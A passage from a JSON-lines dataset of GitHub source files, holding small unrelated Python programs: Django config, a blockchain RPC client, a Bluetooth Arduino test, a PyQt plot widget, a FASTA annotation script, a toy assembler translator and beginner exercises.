name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"categories/\", views.categories, name=\"categorie\"),\n path(\"auction/\", views.auction, name=\"auction\"),\n path(\"auction//comment\", views.comment, name=\"comment\"),\n path(\"auction/close\", views.close, name=\"close\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"watch\", views.watch, name=\"watch\"),\n]\n","repo_name":"victorpasson/commerce-cs50w","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12479609401","text":"# -*- coding: utf-8 -*-\nfrom django.core.urlresolvers import reverse_lazy\n\n#GENERAL SETTINGS\nDETAILS_TABS = {\n 'info' : True,\n '3d' : True,\n 'images' : True,\n 'events' : True,\n 'stakeholder' : True,\n 'discussion' : True,\n 'map' : True,\n 'etherpad' : True,\n}\n\nORDER_BTNS = [\n {'value' : 'name', 'text' : 'Name'},\n {'value' : '-created', 'text' : 'Datum'},\n # {'value' : '-num_stakeholder', 'text' : '# Beteiligte'},\n {'value' : '-ratings_avg', 'text' : 'Bewertung'},\n # {'value' : '-ratings_count', 'text' : '# Bewertungen'},\n {'value' : '-wbcrating', 'text' : 'Punkte'},\n]\n\n#SWITCH ON/OFF PARTS OF THE WBC APP\nGENERAL_CONTENT = {\n 'blog' : True,\n 'lexikon' : True,\n 'account' : True,\n 'wbcrating': True,\n 'number_votes': 3,\n 'starrating': True,\n 'featured' : True,\n 'updownvote': True,\n 'social_media_share': True,\n}\n\n#TOP BOXES ON STARTPAGE\nSTARTPAGE_OVERVIEW_ICONS = [\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n]\n\n#BOTTOM BOXES ON STARTPAGE\nSTARTPAGE_TOPIC_ICONS = [\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') }\n]\n\n\n#SEARCH\nDEFAULT_VIEW_MAP = True # True = map, False = kachel, None = list\nSHOW_ENTITY_FILTER = True # kann man nach entities filtern\nSHOW_ADDITIONAL_FILTER = True # switchtes additional filters on/off\nTERMINATED_PROJECTS = True\n","repo_name":"webuildcity/polis","sub_path":"city/content_settings.py","file_name":"content_settings.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"31239817351","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom codim1.core import *\nfrom codim1.assembly import *\nfrom codim1.fast_lib import *\nfrom codim1.post import *\nimport codim1.core.tools as tools\n\n\nx_pts = 30\ny_pts = 30\nn_elements = 40\ndegree = 1\nquad_min = degree + 1\nquad_max = 3 * degree\nquad_logr = 3 * degree + 1\nquad_oneoverr = 3 * degree + 1\ninterior_quad_pts = 13\n\nek = ElasticKernelSet(1.0, 0.25)\n\nleft_end = np.array((-1.0, 0.0))\nright_end = np.array((1.0, -0.0))\nmesh = simple_line_mesh(n_elements, left_end, right_end)\n# tools.plot_mesh(mesh)\n# plt.show()\nbf = basis_from_degree(degree)\nqs = QuadStrategy(mesh, quad_min, quad_max, quad_logr, quad_oneoverr)\napply_to_elements(mesh, \"basis\", bf, non_gen = True)\napply_to_elements(mesh, \"continuous\", True, non_gen = True)\napply_to_elements(mesh, \"qs\", qs, non_gen = True)\napply_to_elements(mesh, \"bc\",\n BC(\"crack_displacement\", ConstantBasis([1.0, 0.0])),\n non_gen = True)\nsgbem_dofs(mesh)\n\nmatrix, rhs = sgbem_assemble(mesh, ek)\nimport ipdb;ipdb.set_trace()\nsoln_coeffs = np.linalg.solve(matrix, rhs)\n\n\nx, u, t = evaluate_boundary_solution(mesh, soln_coeffs, 8)\n\nplt.figure(1)\ndef plot_tx():\n plt.plot(x[0, :], t[0, :])\n plt.xlabel(r'X')\n plt.ylabel(r'$t_x$', fontsize = 18)\ndef plot_ty():\n plt.plot(x[0, :], t[1, :])\n plt.xlabel(r'X')\n plt.ylabel(r'$t_y$', fontsize = 18)\nplot_tx()\n# plt.plot(x[0, :], correct)\nplt.figure()\nplot_ty()\nplt.show()\n\n# tx = t[0, :]\n# ty = t[1, :]\n# distance_to_left = np.sqrt((x[:, 0] - left_end[0]) ** 2 +\n# (x[:, 1] - left_end[1]) ** 2)\n#\n# x = np.linspace(-5, 5, x_pts)\n# # Doesn't sample 0.0!\n# y = np.linspace(-15, 15, y_pts)\n# X, Y = np.meshgrid(x, y)\n#\n# x = np.linspace(-5, 5, x_pts)\n# # Doesn't sample 0.0!\n# y = np.linspace(-5, 5, y_pts)\n# sxx = np.zeros((x_pts, y_pts))\n# sxy = np.zeros((x_pts, y_pts))\n# sxy2 = np.zeros((x_pts, y_pts))\n# syy = np.zeros((x_pts, y_pts))\n# displacement = np.zeros((x_pts, y_pts, 2))\n# def fnc(x,d):\n# if d == 0 and x[0] <= 1.0 and x[0] >= -1.0:\n# return 1.0\n# return 0.0\n# # displacement_func = BasisFunctions.from_function(fnc)\n# #\n# # ip = InteriorPoint(mesh, dh, qs)\n# # for i in range(x_pts):\n# # print i\n# # for j in range(y_pts):\n# # displacement[j, i, :] += ip.compute((x[i], y[j]),\n# # np.array([0.0, 0.0]),\n# # k_t, displacement_func)\n# # # sxx[j, i], sxy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),\n# # # np.array((0.0, 1.0)))\n# # # sxy2[j, i], syy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),\n# # # np.array((1.0, 0.0)))\n# # int_ux = displacement[:, :, 0]\n# # int_uy = displacement[:, :, 1]\n# #\n# # plt.figure(7)\n# # plt.imshow(int_ux)\n# # plt.title(r'Derived $u_x$')\n# # plt.colorbar()\n# #\n# # plt.figure(8)\n# # plt.imshow(int_uy)\n# # plt.title(r'Derived $u_y$')\n# # plt.colorbar()\n#\n# # plt.figure(9)\n# # plt.imshow(sxy)\n# # plt.title(r'Derived $s_{xy}$')\n# # plt.colorbar()\n# #\n# # plt.figure(10)\n# # plt.imshow(sxx)\n# # plt.title(r'Derived $s_{xx}$')\n# # plt.colorbar()\n# # plt.figure(11)\n# # plt.imshow(sxy2)\n# # plt.title(r'Derived $s_{xy2}$')\n# # plt.colorbar()\n# #\n# # plt.figure(12)\n# # plt.imshow(syy)\n# # plt.title(r'Derived $s_{yy}$')\n# # plt.colorbar()\n# # plt.figure(11)\n# # plt.imshow(int_ux - exact_grid_ux)\n# # plt.title(r'Error in $u_x$')\n# # plt.colorbar()\n#\n# plt.show()\n","repo_name":"tbenthompson/codim1","sub_path":"examples/dislocation.py","file_name":"dislocation.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"534720986","text":"# Task 10. Money Counting Game\n\n# Get user data\ncoin_1 = int(input(\"Select the quantity of one cent coin: \"))\ncoin_5 = int(input(\"Select the quantity of five cent coin: \"))\ncoin_10 = int(input(\"Select the quantity of ten cent coin: \"))\ncoin_25 = int(input(\"Select the quantity of twenty-five cent coin: \"))\n\n# Show user values\nprint (\"Your choise:\")\nprint (\"1 cent: \", coin_1, \"pcs\")\nprint (\"5 cent: \", coin_5, \"pcs\")\nprint (\"10 cent: \", coin_10, \"pcs\")\nprint (\"25 cent: \", coin_25, \"pcs\")\n\n# Set values\ndollar = 100\ncent_1 = 1\ncent_5 = 5\ncent_10 = 10\ncent_25 = 25\n\n# Calculation\ntotal_cent_1 = coin_1 * cent_1\ntotal_cent_5 = coin_5 * cent_5\ntotal_cent_10 = coin_10 * cent_10\ntotal_cent_25 = coin_25 * cent_25\ntotal_sum = total_cent_1 + total_cent_5 + total_cent_10 + total_cent_25\n\n# Return result\nif total_sum == dollar:\n\tprint(\"CONGRATULATIONS!!! YOU WIN!!!\")\nelif total_sum > dollar:\n\tprint(\"Total value of the coins is more than one dollar\")\nelif total_sum < dollar:\n\tprint(\"Total value of the coins is less than one dollar\")","repo_name":"ArtDenis83/Tasks-of-Tony-Gaddis","sub_path":"Chapter 3/Ch3_task_10.py","file_name":"Ch3_task_10.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41586049719","text":"# -*- coding: utf-8 -*-\n\nfrom requests import Session\nfrom requests.adapters import HTTPAdapter\nfrom requests.exceptions import ConnectionError\n\nimport json\nfrom time import sleep, time\nfrom pprint import pprint\nfrom itertools import cycle\n\nfrom .storage import nodes, api_total\n#from .proxy import Proxy\n\nclass Http():\n\n\thttp = Session()\n\tproxies = None\n\n\nclass RpcClient(Http):\n\n\tRPS_DELAY = 1.00\t# ~3 requests per second\n\tlast_request = 0.0\n\t\n\t\"\"\" Simple Steem JSON-RPC API\n\t\tThis class serves as an abstraction layer for easy use of the Steem API.\n\n\t\trpc = RpcClient(nodes=nodes) or rpc = RpcClient()\n\t\tArgs:\n\t\t\tnodes (list): A list of Steem HTTP RPC nodes to connect to.\n\t\t\n\t\tany call available to that port can be issued using the instance\n\t\trpc.call('command', *parameters)\n\t\"\"\"\n\t\n\theaders = {'User-Agent': 'thallid', 'content-type': 'application/json'}\n\n\t\n\tdef __init__(self, report=False, **kwargs):\n\n\t\tself.api_total = api_total\n\t\t\n\t\tself.report = report\n\t\tself.PROXY = kwargs.get(\"PROXY\", False)\n\t\tif self.PROXY: self.proxies = Proxy()\n\n\t\tself.nodes = cycle(kwargs.get(\"nodes\", nodes))\t\t# Перебор нод\n\t\tself.url = next(self.nodes)\n\t\t\n\t\tself.num_retries = kwargs.get(\"num_retries\", 3)\t\t# Количество попыток подключения к ноде\n\t\tadapter = HTTPAdapter(max_retries=self.num_retries)\n\t\tfor node in nodes:\n\t\t\tself.http.mount(node, adapter)\n\t\t\t\n\t\t\n\tdef get_response(self, payload):\n\t\n\t\tdata = json.dumps(payload, ensure_ascii=False).encode('utf8')\n\t\n\t\twhile True:\n\t\t\t\t\n\t\t\tn = 1\n\t\t\tproxies = self.proxies.get_http() if self.PROXY else None\n\t\t\twhile n < self.num_retries:\n\t\t\t\ttry:\n\t\t\t\t\n\t\t\t\t\t# Ограничение по запросам в секунду\n\t\t\t\t\tdelay = self.RPS_DELAY - (time() - self.last_request)\n\t\t\t\t\tif delay > 0: sleep(delay)\n\t\t\t\t\n\t\t\t\t\t#response = self.http.post(self.url, data=data, headers=self.headers, proxies=proxies, auth=auth)\n\t\t\t\t\tresponse = self.http.post(self.url, data=data, headers=self.headers, proxies=proxies, timeout=30)\n\t\t\t\t\tself.last_request = time()\n\t\t\t\t\t\n\t\t\t\t\tif response.status_code == 503:\n\t\t\t\t\t\tproxies = self.proxies.new_http() if self.PROXY else None\t# next proxy\n\t\t\t\t\t\tprint('new proxy', proxies)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn response\n\t\t\t\t\t\n\t\t\t\t#except ConnectionError as ce:\n\t\t\t\texcept:\n\t\t\t\t\t#print('ce', ce)\n\t\t\t\t\tsleeptime = (n - 1) * 2\n\t\t\t\t\tif self.report:\n\t\t\t\t\t\tprint(\"Lost connection to node during rpcconnect(): %s (%d/%d) \" % (self.url, n, self.num_retries))\n\t\t\t\t\t\tprint(\"Retrying in %d seconds\" % sleeptime)\n\t\t\t\t\tsleep(sleeptime)\n\t\t\t\t\tn += 1\n\t\t\t\t\t\n\t\t\tself.url = next(self.nodes)\t\t\t# next node\n\t\t\tprint(\"Trying to connect to node %s\" % self.url, 'error in get_response rpc_client', proxies)\n\t\t\t\t\n\t\treturn False\n\n\t\t\t\t\t\n\tdef call(self, name, *params, **kwargs):\n\t\n\t\t# Определяем для name своё api\n\t\tapi = self.api_total[name]\n\t\t#method = kwargs.get('method', 'condenser_api.')\t#steem\n\t\tmethod = kwargs.get('method', 'call')\n\t\tparameters = kwargs.get('params', [api, name, params])\n\t\t#payload = {\"method\": method + name, \"params\": parameters, \"id\": 1, \"jsonrpc\": '2.0'}\t#steem\n\t\tpayload = {\"method\": method, \"params\": parameters, \"id\": 1, \"jsonrpc\": '2.0'}\n\t\tresult = None\n\t\t\n\t\tn = 1\n\t\twhile n < self.num_retries:\n\t\t\tresponse = self.get_response(payload)\n\n\t\t\tif response:\n\t\t\t\tif response.status_code == 200:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tres = response.json()\n\t\t\t\t\t\tif 'error' in res:\n\t\t\t\t\t\t\tif self.report:\n\t\t\t\t\t\t\t\t#pprint(res[\"error\"][\"message\"])\n\t\t\t\t\t\t\t\tprint('ERROR IN RES', res[\"error\"][\"message\"])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresult = res[\"result\"]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint('ERROR JSON', response)\n\t\t\t\t#elif response.status_code == 503:\n\t\t\t\t#\tproxies = self.proxies.new_http() if self.PROXY else None\t# next proxy\n\t\t\t\t#\tprint('new proxy', proxies)\n\n\t\t\t\telse:\n\t\t\t\t\tif self.report:\n\t\t\t\t\t\tprint(n, 'ERROR status_code', response.status_code, response.text)\n\t\t\telse:\n\t\t\t\tprint('not connection to node', self.url)\n\t\t\t\t\n\t\t\tprint('response', response)\n\t\t\tn += 1\n\t\t\tself.url = next(self.nodes)\t\t\t# next node\n\t\t\tsleep(n * 2)\n\t\t\tprint(\"Trying to connect to node %s\" % self.url, 'for method', name)\n\t\t\n\t\treturn result\n\n\n#----- main -----\nif __name__ == '__main__':\n\tpass","repo_name":"ksantoprotein/thallid-golos","sub_path":"tgolosbase/rpc_client.py","file_name":"rpc_client.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"14134314582","text":"'''\nBluetooth/Pyjnius example\n=========================\nThis was used to send some bytes to an arduino via bluetooth.\nThe app must have BLUETOOTH and BLUETOOTH_ADMIN permissions (well, i didn't\ntested without BLUETOOTH_ADMIN, maybe it works.)\nConnect your device to your phone, via the bluetooth menu. After the\npairing is done, you'll be able to use it in the app.\n'''\nfrom jnius import autoclass\nimport time\nbmsgcount = 0\n\nBluetoothAdapter = autoclass('android.bluetooth.BluetoothAdapter')\nBluetoothDevice = autoclass('android.bluetooth.BluetoothDevice')\nBluetoothSocket = autoclass('android.bluetooth.BluetoothSocket')\n\ndef breceivemsg(recv_stream):\n global bmsgcount\n bmsgcount += 1\n\n while recv_stream.ready != None:\n try:\n line = recv_stream.readLine()\n except jnius.jnius.JavaException as e:\n print(\"JavaException: \", e, rfsocket.connected)\n \n except ValueError as e:\n print(\"Misc error: \", e)\n\n try:\n print(msgcount, line)\n except ValueError:\n pass\n \n \nUUID = autoclass('java.util.UUID')\n\ndef get_socket_stream(name):\n paired_devices = BluetoothAdapter.getDefaultAdapter().getBondedDevices().toArray()\n socket = None\n for device in paired_devices:\n if device.getName() == name:\n socket = device.createRfcommSocketToServiceRecord(\n UUID.fromString(\"00001101-0000-1000-8000-00805F9B34FB\"))\n recv_stream = socket.getInputStream()\n send_stream = socket.getOutputStream()\n break\n socket.connect()\n return recv_stream, send_stream\n\nif __name__ == '__main__':\n recv_stream, send_stream = get_socket_stream('HC-05')\n #send_stream.write('hello\\n')\n #send_stream.flush()\n #print(recv_stream.readline())\n #send_stream.write('hello again\\n')\n #send_stream.flush()\n #print(recv_stream.readline())\n \n # init steppers\n time.sleep(0.2)\n send_stream.write((\"G28\" + \"\\r\").encode()) # steppers off, initialize\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)\n time.sleep(0.2)\n \n # steppers on\n input(\"Press Enter to switch on steppers and start game\")\n something = TextInput('Happy Christmas', 'Press Enter to switch on steppers and start game')\n something = TextInput(text='Press Enter to switch on steppers and start game')\n send_stream.write((\"M17\" + \"\\r\").encode()) # Switch on steppers\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)\n time.sleep(0.2)\n receivemsg(recv_stream)\n \n gstring = \"G1\" + \" X0\" + \" Y200\" + \" Z60\" + \"\\r\"\n send_stream.write(gstring.encode())\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)","repo_name":"rpd123/chess-robot","sub_path":"versiongui/old/bluetoothtest.py","file_name":"bluetoothtest.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"9915595550","text":"from PyQt4 import QtGui, QtCore, QtOpenGL\nfrom PyQt4.QtOpenGL import QGLWidget\nimport OpenGL.GL as gl\nimport OpenGL.arrays.vbo as glvbo\nimport numpy as np\n\nclass PlotWidget(QGLWidget):\n # default window size\n width, height = 1000, 800\n mousepressed = False\n ar = width/float(height)\n draginfo = np.zeros([2,2],dtype =np.float32)\n vselected = []\n initialized = False\n\n def initializeGL(self):\n \"\"\"Initialize OpenGL, VBOs, upload data on the GPU, etc.\n \"\"\"\n self.setMouseTracking(True)\n # background color\n gl.glClearColor(0,0,0,0)\n self.arrayVbo = glvbo.VBO(self.mesh.array)\n self.indexVbo = glvbo.VBO(self.mesh.index, target=gl.GL_ELEMENT_ARRAY_BUFFER)\n self.initialized = True\n\n def meshChanged(self, mesh):\n self.mesh = mesh\n if not self.initialized: \n return\n self.arrayVbo.set_array(mesh.array)\n self.indexVbo.set_array(mesh.index)\n self.update()\n\n def paintGL(self):\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glColor(1,1,0)\n self.arrayVbo.bind()\n self.indexVbo.bind()\n\n gl.glEnableVertexAttribArray(0)\n gl.glVertexAttribPointer(0, 2, self.mesh.array_type, gl.GL_FALSE, 0, None)\n gl.glDrawElements(gl.GL_TRIANGLES, self.mesh.triangle_size, self.mesh.index_type, None)\n\n def paintBox(self):\n gl.glBegin(gl.GL_LINE_LOOP)\n gl.glColor(0,0,1)\n gl.glVertex2f(self.draginfo[0][0], self.draginfo[0][1])\n gl.glVertex2f(self.draginfo[1][0], self.draginfo[0][1])\n gl.glVertex2f(self.draginfo[1][0], self.draginfo[1][1])\n gl.glVertex2f(self.draginfo[0][0], self.draginfo[1][1])\n gl.glEnd()\n\n def resizeGL(self, width, height):\n \"\"\"Called upon window resizing: reinitialize the viewport.\n \"\"\"\n # update the window size\n self.width, self.height = width, height\n # paint within the whole window\n gl.glViewport(0, 0, width, height)\n # set orthographic projection (2D only)\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n self.ar = width / float(height)\n # the window corner OpenGL coordinates are (-+1, -+1)\n gl.glOrtho(-1 * self.ar, 1 * self.ar, 1, -1, -1, 1)\n\n def screentoworld(self, x, y):\n return self.ar*(2*x/float(self.width)-1), 2*y/float(self.height)-1\n\n def updateselected(self):\n bb = (min(self.draginfo[:,0]),\n max(self.draginfo[:,0]),\n min(self.draginfo[:,1]),\n max(self.draginfo[:,1]))\n self.vselected = {v for v in self.graph.vs if inboundingbox(v[\"pos\"], bb)}\n\n def mousePressEvent(self, e):\n self.mousepressed = True\n self.draginfo[:] = self.screentoworld(e.x(), e.y())\n self.update()\n\n def mouseReleaseEvent(self, e):\n self.mousepressed = False\n self.draginfo[:,:] = 0\n self.update()\n\n def mouseMoveEvent(self, e):\n if self.mousepressed:\n self.draginfo[1] = self.screentoworld(e.x(), e.y())\n self.updateselected()\n self.update()\n\ndef inboudningbox(point, bb):\n return point >= bb[0] and point <= bb[1] and point >= bb[2] and point <= bb[3]\n","repo_name":"rasmusoh/gbox","sub_path":"src/widgets/plotwidget.py","file_name":"plotwidget.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23039844810","text":"#!/usr/bin/env python3\n\nimport argparse\nimport warnings\n\nparser = argparse.ArgumentParser(\n\tadd_help=False, # removes original [--help]\n\tdescription='''Script to join sequence and annotations in a simple way (alternative to gff_to fasta, if you don't\nhave a gff file)\nSequence's headers will be like this:\n> | Organism: | Description: \nExample:\n>g1.t1 | Organism: Homo sapiens | Description: Glucose-6-phosphate 1\n-dehydrogenase 5, cytoplasmic\t\t ''',\n\tepilog=\"\"\"We stand before the dawn of a new world.\"\"\", formatter_class=argparse.RawTextHelpFormatter\n)\n\nrequiredNamed = parser.add_argument_group('required arguments')\noptionalNamed = parser.add_argument_group('optional arguments')\n\n# mandatory arguments\n# type (default): string\n\nrequiredNamed.add_argument(\n\t'-annot', '--annotations', dest='annot',\n\tmetavar='[annotations.txt]',\n\thelp='File with id and annotation separated by \\t',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-b', '--basename', dest='basename',\n\tmetavar='[Jonas]',\n\thelp='It\\'s a boy, and will be called Jonas',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-faf', '--fasta', dest='seqs',\n\tmetavar='[fasta.fasta]',\n\thelp='Fasta file with protein sequences, extracted from augustus gff',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-org', '--organism', dest='org',\n\tmetavar='[Homo sapiens]',\n\thelp='Organism name. PS: if you want to pass genus and species give it with \" - ex: \"Homo Sapiens\"',\n\trequired=True\n)\n\n# custom [--help] argument\noptionalNamed.add_argument(\n\t'-h', '-help', '--help',\n\taction='help',\n\tdefault=argparse.SUPPRESS, # hidden argument\n\thelp='It\\'s going to be legen - wait for it - dary!'\n)\n\n# --------------------------------------------------------\n\n# arguments saved here\nargs = parser.parse_args()\n\n# Info from annotation will be stored here\nant = {}\n\n# ============================= Extract annotations ==========================\n\nannot = open(str(args.annot)).read().splitlines()\nfor line in annot:\n\tline = line.split(\"\\t\")\n\tant[line[0]] = line[1]\n\nfasta = open(str(args.seqs), \"r\").read().split(\">\")\ndel fasta[0] # remove empty value\n\n# ============== Write fasta file with new header ==========================\n\nout = open(f\"AnnotaPipeline_{str(args.basename)}_proteins.fasta\", \"w\")\nids_warn = [] # store ids with no annotation\nfor sequence in fasta:\n\tsequence = sequence.split(\"\\n\")\n\tid = sequence[0]\n\ttry:\n\t\tout.write(f\">{str(id)} | Organism: {str(args.org)} | Description: {str(ant[id])}\\n\")\n\t\tout.write(str(\"\\n\".join(sequence[1:])))\n\texcept Exception as warn:\n\t\tids_warn.append(id)\n\t\tpass\n\nout.close()\n\n# =============== Warning message, if something goes wrong =====================\n\nif len(ids_warn) > 0:\n\twarnings.warn(\"WARNING: Not all sequences from fasta file were in annotation file\", stacklevel=2)\n\twarn_seq = open(f\"{str(args.basename)}_ids_with_no_annotations.txt\", \"w\")\n\tfor a in ids_warn:\n\t\twarn_seq.write(str(a) + \"\\n\")\n\twarn_seq.close()\n\twarnings.warn(\"INFO: IDs stored in ids_with_no_annotations.txt\", stacklevel=2)","repo_name":"bioinformatics-ufsc/AnnotaPipeline","sub_path":"Scripts/fasta_simple.py","file_name":"fasta_simple.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"42597468288","text":"import re\nfrom typing import (\n List,\n Optional,\n Tuple,\n)\nfrom machine.isa import INSTRUCTION_TYPES, OperandType, Opcode, Operand, Instruction\n\nNUMBER = r'-?[0-9]+'\nLABEL = r'\\.?[A-Za-z_]+'\nSTRING = r'^(\\'.*\\')|(\\\".*\\\")$'\n\n\ndef parse_label(val: str) -> Optional[str]:\n label = re.match(LABEL, val)\n if label:\n return label[0][:-1]\n return None\n\n\ndef parse_operand(operand: str) -> Operand:\n if parse_label(operand) or parse_label(operand[1:]):\n return Operand(OperandType.LABEL_TO_REPLACE, operand)\n elif operand.startswith('#'):\n return Operand(OperandType.CONSTANT, int(operand[1:]))\n elif operand.startswith('$'):\n return Operand(OperandType.INDIRECT_ADDRESS, int(operand[1:]))\n else:\n return Operand(OperandType.DIRECT_ADDRESS, int(operand))\n\n\ndef parse_instruction(line: str) -> Instruction:\n tokens = line.split()\n assert len(tokens) > 0, 'no tokens in the line'\n\n instr_type = INSTRUCTION_TYPES[tokens[0]]\n operand = None\n if len(tokens) == 2:\n operand = parse_operand(tokens[1])\n return Instruction(instr_type.opcode, operand)\n\n\ndef prepare_code(code: List[str]) -> str:\n prepared_code = map(lambda l: re.sub(r';.*', '', l), code) # remove comments\n prepared_code = map(str.strip, prepared_code) # remove indents\n prepared_code = filter(bool, prepared_code) # remove empty lines\n prepared_code = map(lambda l: re.sub(r'\\s+', ' ', l), prepared_code) # remove extra spaces\n return '\\n'.join(prepared_code)\n\n\ndef parse_data_block(data_block_text: str) -> Tuple[list, dict]:\n data_memory = []\n data_memory_map = {}\n for line in data_block_text.split('\\n'):\n label, val = line.split(':', 1)\n if val.startswith(' word '): # word 23\n data_memory_map[label] = len(data_memory)\n num = int(val[len(' word '):])\n data_memory.append(num)\n elif val.startswith(' db \"'): # db \"string\"\n data_memory_map[label] = len(data_memory)\n string = str(val[len(' db \"'):-1]).replace('\\\\n', '\\n').replace('\\\\t', '\\t').replace('\\\\r', '\\r')\n for char in string:\n data_memory.append(ord(char))\n else:\n assert True, \"unexpected value in data section\"\n return data_memory, data_memory_map\n\n\ndef parse_text_block(text_block_text: str):\n labels_map = {}\n instructions = []\n for line in text_block_text.split('\\n'):\n if ':' in line:\n label, *_ = map(str.strip, line.split(':', 1))\n labels_map[label] = len(instructions)\n else:\n instruction = parse_instruction(line)\n instructions.append(instruction)\n return instructions, labels_map\n\n\ndef update_instructions_with_labels(instructions: List[Instruction], data_labels: dict, code_labels: dict):\n new_instr = []\n for instruction in instructions:\n if instruction.operand and instruction.operand.type == OperandType.LABEL_TO_REPLACE:\n if INSTRUCTION_TYPES[instruction.opcode].is_data_operand:\n if instruction.operand.value.startswith('$'):\n op = data_labels[instruction.operand.value[1:]]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.INDIRECT_ADDRESS, op)))\n else:\n op = data_labels[instruction.operand.value]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n else:\n if instruction.operand.value.startswith('.'):\n op = code_labels[instruction.operand.value[1:]]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n else:\n op = code_labels[instruction.operand.value]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n\n if new_instr[-1].opcode == Opcode.ST or new_instr[-1].opcode == Opcode.JMP or \\\n new_instr[-1].opcode == Opcode.JE: # dirty hack for st/jmp/je etc.\n if new_instr[-1].operand.type == OperandType.DIRECT_ADDRESS:\n new_instr[-1] = Instruction(instruction.opcode, Operand(OperandType.CONSTANT, op))\n elif new_instr[-1].operand.type == OperandType.INDIRECT_ADDRESS:\n new_instr[-1] = Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op))\n else:\n assert False, \"something wrong with st/jmp/je \"\n else:\n new_instr.append(instruction)\n return new_instr\n\n\ndef parse_code(code_text) -> Tuple[list[int], list[Instruction]]:\n code = prepare_code(code_text)\n data_index = code.find('section .data')\n assert data_index != -1, \"no .data section in the code!\"\n text_index = code.find('section .text')\n assert data_index != -1, \"no .text section in the code!\"\n\n if data_index < text_index:\n data_block = code[data_index + len('section .data') + 1: text_index - 1]\n text_block = code[text_index + len('section .text') + 1:]\n else:\n text_block = code[text_index + len('section .text') + 1: data_index - 1]\n data_block = code[data_index + len('section .data') + 1:]\n\n data_memory, data_memory_map = parse_data_block(data_block)\n instructions, instructions_labels_map = parse_text_block(text_block)\n replaced_instr = update_instructions_with_labels(instructions, data_memory_map, instructions_labels_map)\n return data_memory, replaced_instr\n","repo_name":"thematver/itmo","sub_path":"Архитектура компьютеров/Лабораторная 3/machine/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8106559791","text":"n, m = map(int, input().split())\n\na = set()\nb = set()\n\nfor i in range(n):\n string = input()\n a.add(string)\nfor i in range(m):\n string = input()\n b.add(string)\n \nresult = list(a&b)\nresult.sort()\nprint(len(result))\nfor val in result:\n print(val)","repo_name":"micopes/Algorithm","sub_path":"알고리즘 - 파이썬/백준(acmicpc.net)/기타/1764 듣보잡 - set() 이용.py","file_name":"1764 듣보잡 - set() 이용.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"70316696649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('world', '0005_auto_20150324_2057'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='impactzone',\n name='feature',\n field=models.ForeignKey(to='world.ImpactZoneClass'),\n preserve_default=True,\n ),\n ]\n","repo_name":"Oregon-Public-Broadcasting/earthquake-preparedness","sub_path":"world/migrations/0006_auto_20150324_2109.py","file_name":"0006_auto_20150324_2109.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"70817456967","text":"def reverse(stri):\n mylist=[]\n for i in range(len(stri)-1,-1,-1):\n mylist.append(stri[i])\n return 